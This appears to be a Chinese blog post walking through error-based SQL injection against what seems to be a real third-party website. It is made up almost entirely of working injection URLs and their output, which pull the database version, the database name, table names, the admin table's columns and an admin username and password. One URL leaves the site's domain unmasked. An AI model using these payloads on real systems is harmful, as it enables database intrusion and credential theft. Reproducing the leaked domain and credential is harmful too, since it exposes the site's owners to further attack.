• MySQL基于报错注入2


    目标站点:

    0x1 注入点判断

    http://www.xxxxxx.com/pages/services.php?id=1 #true

    http://www.xxxxxx.com/pages/services.php?id=1' #false

    闭合单引号:

    http://www.xxxxxxcom/pages/services.php?id=1' --+ #true

    0x2 获取当前数据库基本信息

    数据库版本信息:

    http://www.xxxxxx.com/pages/services.php?id=1'  +OR+1+GROUP+BY+CONCAT_WS(0x3a,VERSION(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1 --+

    Duplicate entry '10.1.38-MariaDB-cll-lve:1' for key 'group_key'

    当前数据库:

    http://www.xxxxxx.com/pages/services.php?id=1'  +AND(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(DATABASE()+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=DATABASE()+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a) --+

    kuuku205_ohms

    0x3 获取对应库的表名

    http://www.xxxxxx.com/pages/services.php?id=1'  +AND(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(table_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=DATABASE()+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a) --+

    admin_users

    bdetails

    booking

    calendar

    ga_admin_users

    ga_news

    ga_pages

    ga_products

    pages

    photogallery

    。。。。。太多了,这里只关注admin表

    0x4 获取admin_users标的字段

    http://www.xxxxxx.com/pages/services.php?id=1'  +AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(column_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name=0x61646d696e5f7573657273+AND+table_schema=DATABASE()+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a) --+

    Duplicate entry 'userid~1' for key 'group_key'

    http://www.xxxxxx.com/pages/services.php?id=1'  +AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(column_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name=0x61646d696e5f7573657273+AND+table_schema=DATABASE()+LIMIT+1,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a) --+

    Duplicate entry 'password~1' for key 'group_key'

    http://www.ohmsghana.com/pages/services.php?id=1'  +AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(column_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name=0x61646d696e5f7573657273+AND+table_schema=DATABASE()+LIMIT+2,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a) --+

    Duplicate entry 'fname~1' for key 'group_key'

    http://www.xxxxxx.com/pages/services.php?id=1'  +AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(column_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name=0x61646d696e5f7573657273+AND+table_schema=DATABASE()+LIMIT+3,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a) --+

    Duplicate entry 'lname~1' for key 'group_key'

    这里只获取:

    lname,password 即可

    0x5 获取数据库字段数据

    http://www.xxxxxx.com/pages/services.php?id=1'  +AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(CONCAT(lname,0x7e,password)+AS+CHAR),0x7e))+FROM+admin_users+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a) --+

    Duplicate entry 'Staff~admin4ohms~1' for key 'group_key'

  • 相关阅读:
    20170809上课笔记
    20170808上课笔记
    20170807上课笔记
    20170804上课笔记
    《备份恢复3》
    《备份恢复2》
    《SQL语句测试》
    《备份恢复1》
    《oracle管理7》
    《oracle管理6》
  • 原文地址:https://www.cnblogs.com/hack404/p/10838641.html
Copyright © 2020-2023  润新知